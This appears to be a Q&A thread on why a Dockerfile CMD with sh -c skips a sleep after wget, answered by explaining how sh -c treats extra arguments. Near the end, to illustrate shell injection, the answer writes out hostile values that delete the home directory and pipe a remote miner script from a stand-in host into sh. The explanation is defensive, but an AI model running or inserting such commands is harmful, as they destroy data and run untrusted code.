# Dockerfile not executing CMD commands in serie

Tags: docker, shell, dockerfile, sleep

I have created a Dockerfile which I will be testing in kubernetes. It's an ubuntu image and I need it to

1. Do a wget
2. Leave a process running so the container doesn't shuts down after the wget

I could have used a nginx image to comply with step 2. But I didn't, instead, in the CMD clause I just put `sleep 1000000` which has usually worked for me so the container doesn't stops. The reason why I didn't do something proper to leave a process running is of no importance now. What is important is the following question.

This is my Dockerfile

```
FROM ubuntu:latest
RUN apt-get update \
&& apt-get install -y iputils-ping \
&& apt-get install -y wget



CMD ["sh","-c","wget https://httpbin.org/get","&&","sleep 1000000000000"]
```

After I build it, for some reason, it shuts down almost instantly after I hit `docker run -d <image_name>`. But by looking at the logs `docker logs -t <container_name>` I can see the wget command worked correctly.

My question is, why does the `"&&","sleep 1000000000000"` part of the CMD of the Dockefile didn't came up after the wget finished? I know it didn't came up because the container runs the wget properly and then exists with status 0, even though that `sleep` should leave it running for days.

The reasons why I run that wget to a dummy server is of no importance now, when I test at k8s I will replace it for an actual service to see if its reachable. So it's of no importance, the question would be why did the `sleep` didn't executed after the `wget`

Comment: How would you do this task without Docker?  This workflow sounds like you want to retrieve some file, but then have the `wget` process not exit; what would you do with the process then?  (Do you want to `RUN wget ...` as part of the image build, so that the `CMD` can be some long-running process?)

Answer (score 2, accepted):

#### Fixing the problem

The correct way to write what you want is:

```
CMD ["sh", "-c", "wget https://httpbin.org/get && sleep 1000000000000"]
```

...or its precise equivalent,

```
CMD wget https://httpbin.org/get && sleep 1000000000000
```

---

#### Explaining the problem

`sh -c` only takes **one argument** to parse as code.

The argument after that one becomes `$0` in the context where that code is run.

The argument after *that* one becomes `$1`.

The argument after *that* one becomes `$2`... etc.

But because the shell script `wget https://httpbin.org/get` doesn't look at `$0` or `$1`, all your subsequent arguments just get ignored entirely.

---

#### What good is that behavior?

If you wanted to actually *use* those extra arguments, you might instead do something like:

```
CMD ["sh", "-c", "wget \"$1\" && sleep \"$2\"", "sh", "https://httpbin.org/get", "1000000000000"]
```

...wherein `$0` becomes `sh` (used in error messages); `$1` becomes `https://httpbin.org/get`, and `$2` becomes the desired amount of sleep.

The main advantage of this is that *only the argument following `-c` is parsed as code by the shell, so only the contents of that argument can be used for shell injection attacks* (presuming that later code doesn't do something stupid, such as `eval`ing that data). You can put completely untrusted content into later arguments, and you might need to worry about how `wget` or `sleep` parses or behaves with that content, but you don't need to worry about how the shell itself will behave with it; so if you're passing through a URL from someone who might try to sneak in a `$(rm -rf ~)` or a `$(curl https://evil.co/bitcoin-miner | sh -)`, it's safer to pass that content as an argument instead of in-band with your code.